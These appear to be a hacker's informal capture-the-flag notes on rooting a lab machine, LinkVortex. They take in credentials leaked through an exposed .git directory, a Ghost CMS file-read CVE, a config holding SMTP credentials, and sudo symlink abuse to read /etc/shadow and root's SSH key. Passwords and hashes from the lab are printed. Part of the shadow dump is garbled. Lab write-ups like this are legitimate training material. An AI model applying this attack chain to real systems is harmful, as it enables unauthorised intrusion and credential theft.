page available but don’t have permissions to see it

CMS (content management system) is GHOST

linkvortex.htb/ghost is login page

i can see on the site that admin is a user

GHOST 5.58 is being used I have CVE for it # CVE-2023-40028 but need admin password?

need to enumerate dev subdomain have not found anything there> getting word list diffed?

nmap taking 50 bilion years for some reason idk why

this is the only subdomain http://dev.linkvortex.htb/

found dev.linkvortex.htb/.git directory

creds

in there on one of the commits you have hard coded credentials it(‘complete setup’, async function () { const email = ‘test@example.com’; const password = ‘OctopiFociPilfer45’;

more creds

name: ‘test user’, email: ‘test-leo@example.com’, password: ‘thisissupersafe’, blogTitle: ‘a test blog’

name: ‘test user edit’, email: ‘test-edit@example.com’, password: ‘thisissupersafe’, blogTitle: ‘a test blog’

const email = ‘test@example.com’; const password = ‘thisissupersafe’;

I have creds and passwords and i have the exploit, what I don’t have is a username what is the username?

admin? linkvortex? link? vortex?

found user

admin@linkvortex.htb password: OctopiFociPilfer45

dumped /etc/passwd

file> /etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin node:x:1000:1000::/home/node:/bin/bash

ghost 5.58 is the version

running a docker container with it to identify what important files i need to read

got this from /var/lib/ghost/config.development.json

}, “mail”: { “transport”: “SMTP”, “options”: { “service”: “Google”, “host”: “linkvortex.htb”, “port”: 587, “auth”: { “user”: “bob@linkvortex.htb”, “pass”: “fibber-talented-worth” } } }

can log into ssh with this password/user !!!!!

user flag

can run this as root

User bob may run the following commands on linkvortex: (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

/etc/shadow

bob@linkvortex:/opt/ghost $s u d o / u sr / bin / ba s h / o pt / g h os t / c l e a n_{s} y m l ink . s h / h o m e / b o b / t es t . p n gL ink f o u n d [/ h o m e / b o b / t es t . p n g], m o v in g i tt o q u a r an t in e C o n t e n t : roo t :$ y $j 9 T$ C3zg87gHwrCXO0vl4igIh/ $ii s f 9 s V w i l K A i 7 m I 5 p 1 FqQ s l J W M 9 t 2. Y U W z n I PC / X I A : 19814 : 0 : 99999 : 7 ::: d a e m o n : * : 19579 : 0 : 99999 : 7 ::: bin : * : 19579 : 0 : 99999 : 7 ::: sys : * : 19579 : 0 : 99999 : 7 ::: sy n c : * : 19579 : 0 : 99999 : 7 ::: g am es : * : 19579 : 0 : 99999 : 7 ::: man : * : 19579 : 0 : 99999 : 7 ::: lp : * : 19579 : 0 : 99999 : 7 ::: mai l : * : 19579 : 0 : 99999 : 7 ::: n e w s : * : 19579 : 0 : 99999 : 7 ::: uu c p : * : 19579 : 0 : 99999 : 7 ::: p ro x y : * : 19579 : 0 : 99999 : 7 ::: www - d a t a : * : 19579 : 0 : 99999 : 7 ::: ba c k u p : * : 19579 : 0 : 99999 : 7 ::: l i s t : * : 19579 : 0 : 99999 : 7 ::: i rc : * : 19579 : 0 : 99999 : 7 ::: g na t s : * : 19579 : 0 : 99999 : 7 ::: n o b o d y : * : 19579 : 0 : 99999 : 7 :: :_{a} pt : * : 19579 : 0 : 99999 : 7 ::: sys t e m d - n e tw or k : * : 19579 : 0 : 99999 : 7 ::: sys t e m d - reso l v e : * : 19579 : 0 : 99999 : 7 ::: m ess a g e b u s : * : 19579 : 0 : 99999 : 7 ::: sys t e m d - t im esy n c : * : 19579 : 0 : 99999 : 7 ::: p o ll ina t e : * : 19579 : 0 : 99999 : 7 ::: ss h d : * : 19579 : 0 : 99999 : 7 ::: u s bm ux : * : 19814 : 0 : 99999 : 7 ::: b o b :$ 6 $ro u n d s = 656000$ 4p3mw8hAd9ir.25f$ocGm9nW1TM2AB8Z.l0K.hi43bOrm3oxQsaKFACMoS2UL.tIXxSW3u/xsClrvkEhP5s.GUpdIvCX3qRtppDV8r.:19814:0:99999:7::: dnsmasq:*:19814:0:99999:7::: _laurel:!:20057::::::

was able to read files with script creating a double sym link

did it from bob directory theres a weird sticky bit in tmp thta stops it from working????

after this read /root/.ssh/id_rsa thats the private ssh key

logged into root with ssh -i private_key root@linkvortex.htb

thats it pwn

👾 Dedbit Hacks

Explorer

Notes